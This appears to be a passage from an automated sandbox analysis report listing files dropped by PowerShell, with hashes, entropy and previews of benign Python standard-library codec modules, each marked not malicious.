                                                                                                                                                                                                              SHA-512:CFEA01544E998CAED550B37B61439014D0BA6D707068F1D7E4726A6AC8F4B8B81C2E7ED3A5DFB76687D1FDBCD7EC2DC6C5047D8061ECCBC8A59A4587FCBED253
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:"""Python 'base64_codec' Codec - base64 content transfer encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs..import base64....### Codec APIs....def base64_encode(input, errors='strict'):.. assert errors == 'strict'.. return (base64.encodebytes(input), len(input))....def base64_decode(input, errors='strict'):.. assert errors == 'strict'.. return (base64.decodebytes(input), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return base64_encode(input, errors).. def decode(self, input, errors='strict'):.. return base64_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. assert self.errors == 'strict'.. return base64.encodebytes(input)....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. assert self.errors
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1058
                                                                                                                                                                                                              Entropy (8bit):4.522034261788674
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nUqj2Oz6f/XoBKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9sAcJxFplR:UqvLV62VJjRU8njOxLnrxLbrLKaJxTz
                                                                                                                                                                                                              MD5:9AE0A356995140BFF35627C45E7DA1B8
                                                                                                                                                                                                              SHA1:7A23003577D29B3470BEE6EE996EAA2EA120FDD3
                                                                                                                                                                                                              SHA-256:CADB1C66D355F551E4D99A895725B62211CC5CBDE1F037C61FD4463932FF70CB
                                                                                                                                                                                                              SHA-512:F8764CFB30BD5EE67B527DC0FF5E70E41F03D617EF3AB0A3DE021825B751105373A251919E00A9F5C4F581471B393565A51C3B09B4CD1BD11BD8EBBA37545B42
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# big5.py: Python Unicode Codec for BIG5..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_tw, codecs..import _multibytecodec as mbc....codec = _codecs_tw.getcodec('big5')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='big5',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1078
                                                                                                                                                                                                              Entropy (8bit):4.563261678208351
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nCqjMOzCf/XophKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9s2cJxFpz:CqZjp162VJjRU8njOxLnrxLbrLKKJxTz
                                                                                                                                                                                                              MD5:DB9A713E27FB20F00437D9DAB32C1FAC
                                                                                                                                                                                                              SHA1:E7E0DAF3371FDC04C5DA6DFB0F9D1B93BC44620F
                                                                                                                                                                                                              SHA-256:7FCF88553A656ABE5E4DC1A8E89D1E279DDEC83DE79E22F971AC04E7632708E9
                                                                                                                                                                                                              SHA-512:AAA035F5C5930233004855D9876B87D95FFAA5B8CE21F62FB499966BB8F29B5A5F4BF501FAC5013F5E8CA8F9D1DE8A0F1A288E346A87EF52BA2AF43AEB56E500
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# big5hkscs.py: Python Unicode Codec for BIG5HKSCS..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_hk, codecs..import _multibytecodec as mbc....codec = _codecs_hk.getcodec('big5hkscs')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='big5hkscs',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2327
                                                                                                                                                                                                              Entropy (8bit):4.640437967116185
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:XT1NsDZd91AIFjz1AIo31951TuY51w6P7z0/51wz2xth+yvIvPTK2yJxHjH:XxeDZX/Fjz/o3JNuY5H7zq53thA3TKvD
                                                                                                                                                                                                              MD5:1AA105E7EED39A1B52B24B524B541AB0
                                                                                                                                                                                                              SHA1:9DE4EB2157EF2D0339EB565B0BD2AD6DBA1172B3
                                                                                                                                                                                                              SHA-256:A0A34436976BB5137403C148CB8B332653F14CAA6CDF102150E82646D5249A5E
                                                                                                                                                                                                              SHA-512:CDA0CDAA96ECC52F5D57C9CA9D118B90D2E93630D47ED9CB99E0BA07A40D03470872676CB00B7DEE70089045E9AAB3BF37AF09DF075B7C5212947C9A17F66979
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:"""Python 'bz2_codec' Codec - bz2 compression encoding.....This codec de/encodes from bytes to bytes and is therefore usable with..bytes.transform() and bytes.untransform().....Adapted by Raymond Hettinger from zlib_codec.py which was written..by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs..import bz2 # this codec needs the optional bz2 module !....### Codec APIs....def bz2_encode(input, errors='strict'):.. assert errors == 'strict'.. return (bz2.compress(input), len(input))....def bz2_decode(input, errors='strict'):.. assert errors == 'strict'.. return (bz2.decompress(input), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return bz2_encode(input, errors).. def decode(self, input, errors='strict'):.. return bz2_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. assert errors == 'strict'.. self.errors = errors..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2153
                                                                                                                                                                                                              Entropy (8bit):4.704086253537808
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:ad1E6SbuY5qRl45qrO6SA13MNOg106SA13MNOo1tRTKyQJxHf:adKlbuY5qRl45qrOW13Mkg2y13MooDRm
                                                                                                                                                                                                              MD5:8A14214EF1C47A40C56C08A793FC9923
                                                                                                                                                                                                              SHA1:73205DCA66A87C26464472C25D39795BFFF46F88
                                                                                                                                                                                                              SHA-256:1EA641E7C63C0A022A663F5D2024A71124272E088C246583D2D44CDDDF548A32
                                                                                                                                                                                                              SHA-512:D7E94201E8168043BE5BD6D1CE5B0720E653EC84A7ABBEAB6F99781228435C590D75B1FE3AE58B700287E6AABC7A44DA4059561F22317B7A529263E1AD2A3C8F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Generic Python Character Mapping Codec..... Use this codec directly rather than through the automatic.. conversion mechanisms supplied by unicode() and .encode().......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.charmap_encode.. decode = codecs.charmap_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict', mapping=None):.. codecs.IncrementalEncoder.__init__(self, errors).. self.mapping = mapping.... def encode(self, input, final=False):.. return codecs.charmap_encode(input, self.errors, self.mapping)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def __init__(self, errors='strict', mapping=None):.. c
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13428
                                                                                                                                                                                                              Entropy (8bit):4.523742655695844
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:HHhsuOTDvR6UZkPS9BC4KNVFIhRNvcE8bV2H2QB:KT7C4PRcE8bgWQB
                                                                                                                                                                                                              MD5:A28DE4284DFAEFEC5CF40EE279C388F3
                                                                                                                                                                                                              SHA1:5EEF5925AC2C77227A03067E17808B5F10C41018
                                                                                                                                                                                                              SHA-256:FA3FF4B328C72315EC622CD62FEAC21189A3C85BCC675552D0EC46677F16A42C
                                                                                                                                                                                                              SHA-512:8FD7FD3C0A099A5851E9A06B10D6B44F29D4620426A04AE008EB484642C99440571D1C2C52966D972C2C91681EBD1C9BF524B99582D48E707719D118F4CD004A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp037 generated from 'MAPPINGS/VENDORS/MICSFT/EBCDIC/CP037.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp037',.. e
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13875
                                                                                                                                                                                                              Entropy (8bit):4.677799937409236
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:0HhsuOTDvRbUrXPLouhIAs2+ijL5YvwKpVMY4Uq:RTZuhIAlr4C
                                                                                                                                                                                                              MD5:8E2D801694A19B3A569F383708A5F7CB
                                                                                                                                                                                                              SHA1:B1803CF5FF75A77BDA42CED7C15E74861273B713
                                                                                                                                                                                                              SHA-256:1FDCD59D3277C3768DE74DD8CE4F5F8BEEA569C00CBAA3A20714500F3508B8CB
                                                                                                                                                                                                              SHA-512:8DC24DBDC779C89CFA22E28D8175C2A32562EA1F9C070333565A7A8449DEB5C8BF65A886E7A5360EF540E321B3A685530B1E53AE4638232B297450ACEC68B1E8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp1006 generated from 'MAPPINGS/VENDORS/MISC/CP1006.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1006',.. encode=
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13420
                                                                                                                                                                                                              Entropy (8bit):4.5283835755402215
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:RHhsuOTDvR1UZkPS9Dc24sOtV5I8pgYtxj5u1a:ETcc24HXpgY/loa
                                                                                                                                                                                                              MD5:F453ED24A766166472B48010C7712629
                                                                                                                                                                                                              SHA1:0F269160E99FA1ACBC12B882AA9ED1976488B11E
                                                                                                                                                                                                              SHA-256:8C1D85BE11A3A0A5E6A40101C68548480D0378DF0414E3C16D9CBE9F923C028E
                                                                                                                                                                                                              SHA-512:420CD9363A0D72FCA7B22300CE4AC0868320D945E0FCE4C1F09659D4601168F96993D640BEA0FBF9112948D17DE08A41F674DF5E65D34859B9BFB46D89D120D4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp1026 generated from 'MAPPINGS/VENDORS/MICSFT/EBCDIC/CP1026.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1026',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35295
                                                                                                                                                                                                              Entropy (8bit):4.600149049702432
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:WLsuYDvRH0CnFdiaYzF0wrE0PXRN/h4wcuSMXY3uD8HtIMpWx449jBRWJn4bkVdO:r6MBkjh4wVXYrx0HWJn4AVd0kUMy
                                                                                                                                                                                                              MD5:127B6641AE648FF494CD9285BE4C61CC
                                                                                                                                                                                                              SHA1:61464AA653D2AEE959EE90809BDBF98075B1736E
                                                                                                                                                                                                              SHA-256:5286E2162D53A6B189D83B242BC04AB59A48BBBC4ECF094C11BC1542C0604279
                                                                                                                                                                                                              SHA-512:335AC036D6D88270E944FF01D3DCF1B1F1DBE38A75C534836E839DEB474E776EEAB76C08AA4BF150CEA33594AAFAB33EFD593246F958956A4894C2E1819B4C96
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec for CP1125...."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1125',.. encode=Codec().encode,.. decode=Codec().decode,.. incremental
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13412
                                                                                                                                                                                                              Entropy (8bit):4.524379090064879
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:sHhsuOTDvRiUZkPS9BC4KNVFIhRrvcE8bV2H2QB:ZTvC4PDcE8bgWQB
                                                                                                                                                                                                              MD5:C2F88AB320D40C3B1B6394F57A04AF81
                                                                                                                                                                                                              SHA1:A48B25ABE903EFA9C2B073783087ED06F23BCA0F
                                                                                                                                                                                                              SHA-256:0451016F6A4B7013DEA1BA35925412FBAD743DDF46E857BE2C272F2A2CB8D403
                                                                                                                                                                                                              SHA-512:19732A5B121339BD14BD0C7285FD7EE696E7432A28A7B140C92B6206E69011F2FCE50B8B52BCAE7C14DB31444EC9808F27CE07EA4390434ECFBDA096A5E022C6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp1140 generated from 'python-mappings/CP1140.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1140',.. encode=Codec(
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13993
                                                                                                                                                                                                              Entropy (8bit):4.595187696759194
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:mHhsuOTDvR+UrXPLouhIAs2+icI2DCYCTG3RKjV:DTsuhIAlquq4V
                                                                                                                                                                                                              MD5:164A9C1A625524FCB480DBE56076D738
                                                                                                                                                                                                              SHA1:C21A1A50BBAC7EF8D1CC3A2E093FE5EBDBBD35C4
                                                                                                                                                                                                              SHA-256:3FFEA0100ABEF80F916BC2920B296B2EDDD6ECB06FB3CA07549F95FC92CA1F11
                                                                                                                                                                                                              SHA-512:AB0160965CCED9E7BF45D6A64C34A0AC363B4CF5D2447C303397DB79C5F04ED861D9D0D5FF833C0685029E702534DEFE3EBB5AB5B05C5A5842050221CDC91A5B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp1250 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1250.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1250',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13668
                                                                                                                                                                                                              Entropy (8bit):4.623567935376835
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:YHhsuOTDvRBUrXPLouhIAs2+iEI0DCYnWEDp+/:lTPuhIAlYrWEo/
                                                                                                                                                                                                              MD5:E81DE8E87BAB1DEFF99125C66229F26E
                                                                                                                                                                                                              SHA1:5800D009E3D4C428B7303532AAD20BA3BBBE8011
                                                                                                                                                                                                              SHA-256:46FA091D1822434E8D0AF7A92439607018872598FCDE44026F413DD973F14C98
                                                                                                                                                                                                              SHA-512:B14BFE809CF20E5FD82CF5E435983DC5FEAA4E5DE19D16AA4BED7FD0CBFD18A429DD0129AA6058053709CE230CE38224F7CE15CFBCD75A803B04ABC85FA9440B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp1251 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1251.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1251',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13818
                                                                                                                                                                                                              Entropy (8bit):4.5698138915249915
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:OHhsuOTDvR8UrXPLouhIAs2+i/I1DCYkZt6VN6ATdo56G:bTeuhIAlcoZt6to
                                                                                                                                                                                                              MD5:52084150C6D8FC16C8956388CDBE0868
                                                                                                                                                                                                              SHA1:368F060285EA704A9DC552F2FC88F7338E8017F2
                                                                                                                                                                                                              SHA-256:7ACB7B80C29D9FFDA0FE79540509439537216DF3A259973D54E1FB23C34E7519
                                                                                                                                                                                                              SHA-512:77E7921F48C9A361A67BAE80B9EEC4790B8DF51E6AFF5C13704035A2A7F33316F119478AC526C2FDEBB9EF30C0D7898AEA878E3DBA65F386D6E2C67FE61845B4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp1252 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1252.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1252',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13401
                                                                                                                                                                                                              Entropy (8bit):4.649593364658793
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:EHhsuOTDvRPUrXPLouhIAs2+i/I+DCYdlRfA21XHHjfvK8uHZf:hTBuhIAlvRlNr1XO8Ax
                                                                                                                                                                                                              MD5:E86052CD641A07AA72686984073AF47E
                                                                                                                                                                                                              SHA1:D9CAA17B52A5F48087F587B2996388DA799955BF
                                                                                                                                                                                                              SHA-256:E0B0AFBD19DB367C34C505F99A2FCCAFC6BAE3DFD4E316F86375179DCFC60A28
                                                                                                                                                                                                              SHA-512:7F87B2577902646C394FCC2D7A5407B05E23AC3CD07E7749CEDC9898F3E357067729F586011862D9FC8604DB13D0921B060471C3A52B6C17A0F7C5694DDA7788
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp1253 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1253.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1253',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13809
                                                                                                                                                                                                              Entropy (8bit):4.577307574580316
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:OHhsuOTDvRiUrXPLouhIAs2+i/IfDCYuZt6B5TdjN:bTQuhIAlK6Zt69x
                                                                                                                                                                                                              MD5:490756413A61FC0954EFA491244CD487
                                                                                                                                                                                                              SHA1:849EC325801A2E2CC784A54590482593FF89A5A1
                                                                                                                                                                                                              SHA-256:0986ACD9A25FE91C4720C912322253AD105AB951A2D0D364CF0E522E6E52C174
                                                                                                                                                                                                              SHA-512:BCDC7CB6C94600D15F9A3BFA51BDC0D289C997AC40EC4DA1CB0D91B6BFE875968B6C2834FC03D306EE6A3D022955C1C3435864491AF8548E82ACC60E2A215601
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp1254 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1254.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1254',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
